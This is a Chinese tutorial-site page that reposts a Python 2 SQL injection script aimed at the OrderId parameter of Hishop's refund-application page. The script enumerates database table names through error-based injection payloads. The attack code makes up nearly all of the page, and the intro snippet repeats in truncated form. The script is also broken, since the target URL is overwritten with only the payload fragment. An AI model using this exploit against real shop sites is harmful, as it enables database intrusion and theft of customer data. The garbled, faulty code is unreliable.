mssql-注入脚本
发布时间:2023-05-08 12:56:14 所属栏目:MsSql教程 来源:
导读:#coding:utf-8
#Author:LSA
#Description:hishop sqli for /user/UserrefundApply?OrderId=
#Date:20190701
import sys
import requests
from bs4 import BeautifulSoup
import re
headers = {
'Cookie
#Author:LSA
#Description:hishop sqli for /user/UserrefundApply?OrderId=
#Date:20190701
import sys
import requests
from bs4 import BeautifulSoup
import re
headers = {
'Cookie
|
#coding:utf-8 #Author:LSA #Description:hishop sqli for /user/UserrefundApply?OrderId= #Date:20190701 import sys import requests from bs4 import BeautifulSoup import re headers = { 'Cookie': '', 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36' } global tables_name tables_name = "'XWCMFLOWACTION'" #print tables_name def brute_tables(url): for i in range(0,300): url = '(' + tables_name + '))%3E0--' print url rsp = requests.get(url,headers=headers) soup = BeautifulSoup(rsp.text,"lxml") title = soup.p.text print title table_name = re.findall(r"'(.*?)'",title) print table_name print table_name[0] global tables_name tables_name = tables_name + ',\'' + table_name[0] + '\'' print tables_name def main(url): brute_tables(url) if __name__ == '__main__': url = '(' + tables_name + '))%3E0--' main(url) (编辑:汽车网) 【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容! |
推荐文章
站长推荐
